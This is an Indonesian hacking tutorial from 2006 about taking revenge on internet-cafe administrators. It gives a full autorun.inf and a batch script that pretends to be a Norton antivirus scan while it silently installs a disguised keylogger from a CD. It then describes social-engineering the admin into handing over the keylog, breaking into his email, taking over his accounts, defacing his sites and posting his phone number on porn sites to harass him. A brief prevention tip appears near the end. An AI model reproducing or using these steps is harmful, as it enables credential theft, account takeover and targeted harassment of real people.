|
[128]. Pembalasan Untuk Sang
Admin
------------------------------------------------------
Author : SPYRO KiD
Contact : spyro_zone@Yahoo.COM
==> www.spyrozone.tk
CopyLEFT (c) 2006
www.spyrozone.tk All Rights Reserved
� 12/05/2006 01:00:50 WIB
------------------------------------------------------
|---[Table of
Contents
1. Introduction
2. Serangan pertama
3. Serangan kedua
4. Hari pembalasan
5. Cara pencegahan
6. Penutup
1. Introduction
Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan
jasa
layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan)
disana-sini (walaupun semua itu dilakukan bukan tanpa alasan)
menjadi salah
satu inspirasi bagi banyak orang untuk mencari-cari
cara menerobos segala
keterbatasan itu dan saling men-share pengetahuan
mereka. Berbagai jenis
exploit pun dibedah, didiskusikan dan dikemas menjadi
artikel untuk para
newbie.
Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum
sendiri sampai
tak jarang lupa diri :P Namun semua itu tentunya tidak bertahan
lama. Admin
menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive
dihapus dan
melarang user untuk melakukan segala
bentuk transfer file dari media
penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server
terlebih
dahulu. Ini merupakan fenomena yang akhir-akhir ini
bisa kita temui dengan
mudah di berbagai Internet cafe. Admin mulai rajin mengupdate
patch sehingga
exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie
menjadi"rongsokan"
tak berguna.
Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk
menunjukkan
bahwa menjadi paranoid itu adakalanya tidak baik dan tidak
ada system yang
100% secure.
2. Serangan pertama
Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini
biar
ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang
admin.
Tujuannya.. banyak! dan salah satunya seperti hal
yang banyak diinginkan
orang... mendapatkan password sang admin. Partner
kita kali ini adalah
navw32.exe, sebuah keyloger dengan icon Norton
AntiVirus yang bisa kamu
dapatkan suka-suka dengan harga cuma-cuma di halaman member
www.spyrozone.tk
kategori Keyloger. Setelah kamu download keyloger tersebut,
ikuti langkah -
langkah berikut:
---[1 Bukalah Notepad kemudian ketik baris script berikut:
[autorun]
open=nav.bat
Klik [file][save] kemudian pada box save as type, pilih All
Files dan pada
form isian name beri nama Autorun.inf lalu klik tombol [save].
---[2 Buka lembar baru pada notepad dengan klik menu [file] [new]
lalu ketik
script berikut:
@echo off
echo Norton Antivirus 2006
echo Scanning disk drive...
echo Please wait...
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls
Klik [file][save] kemudian pada box save as type, pilih All
Files dan pada
form isian name beri nama nav.bat lalu klik tombol [save].
---[3. Persiapkan beberapa file microsoft word documents (bisa diganti
dengan
file lain) sebagai tipuan/alasan untuk di transfer.
Semakin banyak file,
semakin baik karena file keyloger kamu akan semakin tersamarkan.
---[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar
semua file
diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan)
kedalam CD.
Sekarang pergilah ke warnet tempat sang admin berkuasa.
Bersikaplah seperti
biasa dan jangan gugup selayaknya para koruptor
yang sering nampang di
satasion-stasion TI-PI tanpa rasa malu. Setelah kamu login ke billing
komputer
user, datangi sang admin. Katakan pada
beliau, "Mas/mbak/om/tante/, mau
transfer file dari cd ini. Nama filenya blablabla tolong dikirim
ke komputer
nomor blablabla."
Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis ---> file
autorun.inf
akan memproses file nav.bat ---> file
nav.bat akan menduplikasi file
navw32.exe ke dalam directory windows dan mengaktivkannya ---> Keyloger
telah
terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan
nama
navw32.dll beratribut hidden.
Perlu diketahui bahwa keyloger ini tidak akan menampilkan kotak
dialog dalam
bentuk apapun! So, nggak usah khawatir bakal ketahuan ;)
Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin
(lagi - lagi)
kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot
kayak habis
menang togel.
Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory
windows
sang admin? Ikuti langkah-langkah pada serangan kedua.
3. Serangan kedua
Dua hari Kemudian, datanglah ke warnet itu lagi.
Bertingkahlakulah secara
wajar dan beraktivitas seperti layaknya
user biasa. Setelah selesai
berinternet ria, datangi sang admin, bayarlah biaya browsing
seperti biasa
lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan :)
katakan
pada beliau,"Mas/mbak/om/tante/, komputer saya bermasalah neeh. Menurut
pesan
Error yang muncul, file navw32.dll yang berada di directory
windows hilang.
File tersebut beratribut hidden. Tolong doong copykan
dari komputer ini.
Kebetulan versi windowsnya sama dengan komputer saya.."
Tentu saja biasanya sang admin dengan sangat senang hati akan
membantu kamu.
Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi
Show All
files pada Folder Options dan mengcopy-kan file
navw32.dll dari directory
windows tanpa menyadari bahwa file tersebut bukan file
system, namun file
hasil rekaman keyloger.
Berikan disket/cd/flashdisk mu dan setelah file tersebut
tersimpan, ucapkan
beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah.
Klik
2x pada file lalu ketika muncul kotak dialog open with,
klik opsi select
program from a list dan pilih notepad pada daftar program
yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin.
Cari
password emailnya dan kamu bisa menuju pada hari pembalasan.
4. Hari Pembalasan
Pilih hari yang tepat, misalnya malam jum'at kliwon dimana sang
admin mungkin
sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke
Internet.
Namun ada baiknya kamu lakukan hal ini di warnet agar
lebih aman. Carilah
warnet yang buka 24 jam.
Berbekal hasil rekaman keyloger tadi, loginlah ke account
email sang admin.
Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list
besar
dengan email tersebut. Subscribe sebanyak-banyaknya.
Hohoho.. lalu apa lagi nich?? Kalau sang admin punya
blog/website pribadi/
account Friendster.. tentu kamu dengan mudah mendapatkan semua
password itu
dengan fasilitas forgot password. Kebanyakan penyedia layanan seperti itu
akan
mengirimkan password via email. So, setelah dapat semuanya... heheh...
DEFACE
ajah ;) Tapi inget lho, halaman lama harus tetap di backup dan
jangan merubah
password apapun!!
Ada ide yang sedikit lebih sadis (ini cuma ide
lho.. sebaiknya jangan
dilakukan deech..). Daftarkan emailnya ke berbagai situs -
situs porno dan
postinglah sebuah pesan singkat, memikat dan "mematikan".
Berikut contohnya
jika milis tersebut berbahasa Indonesia:
Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang
juga!! neeh no
telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!
Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata-
kata
yang yahuud!! ;D
Maka bisa dipastikan malam itu akan menjadi
malam jumat kliwon paling
mengerikan bagi sang admin, lebih mengerikan daripada film-film horor
manapun!
Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari
dalam
dan luar negeri dengan maksud pembicaraan
yang sudah bisa ditebak apa
maksudnya ;D
Keesokan harinya, setelah menghadapi malam paling mengerikan itu,
sang admin
akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email
dari
berbagai milis yang beliau sendiri tidak merasa
pernah bergabung dengan
milis-milis itu. Dan bisa jadi, saat beliau
sedang sibuk Unsubcribe dari
milis-milis tersebut, telepon rumahnya masih terus - terusan
menjerit - jerit
dengan jeritan indah :D
5. Pencegahan
Jika kamu adalah admin yang tidak mau mengalami nasib seperti
diatas, maka
setiap kamu menerima CD dari siapapun..
1. Buka windows explorer
2. Tekan-tahan tombol shift sambil memasukkan CD kedalam CD
Room dRive.
3. Setelah CD masuk,tetap tekan tombol shift sampai kira-kira 25
detik.Setelah
itu kamu bisa melepas tombol shift dan mengaksesnya melalui panel sebelah
kiri
windows Explorer. Klik pada area folder tree, jangan pada daftar drive
sebelah
kanan karena fitur autorun akan aktif.
Dan ingat, jangan terlalu percaya pada siapapun! Ada begitu banyak orang
tidak
terduga di sekitar anda!!
6. Penutup
---[+ Kesimpulan
Bisa kita bayangkan sendiri betapa kelalaian sepele bisa
menimbulkan dampak
yang sangat berbahaya. Ini hanya merupakan contoh Social Engineering
sederhana
namun dampaknya.. bisa anda bayangkan sendiri ;)
Cara diatas sudah saya coba pada 4 buah warnet di sidoarjo dan
hasilnya saya
berhasil mendapatkan catatan aktivitas sang admin (password etc..). Tapi
untuk
penerapan "PEMBALASAN" tentu saya tidak melakukan hal sekejam itu ;P
/* ------------------------------|EOF|------------------------------ */
|